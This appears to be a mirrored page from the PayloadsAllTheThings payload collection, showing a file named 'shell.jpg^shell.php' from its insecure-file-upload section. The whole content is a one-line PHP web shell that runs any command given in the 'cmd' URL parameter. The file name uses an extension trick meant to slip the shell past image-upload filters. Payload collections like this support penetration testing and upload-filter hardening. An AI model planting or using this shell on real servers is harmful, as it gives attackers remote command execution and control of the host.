1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-03-07 19:56:22 +01:00
PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.jpg^shell.php

2 lines
44 B
PHP

<?php echo "Shell";system($_GET['cmd']); ?>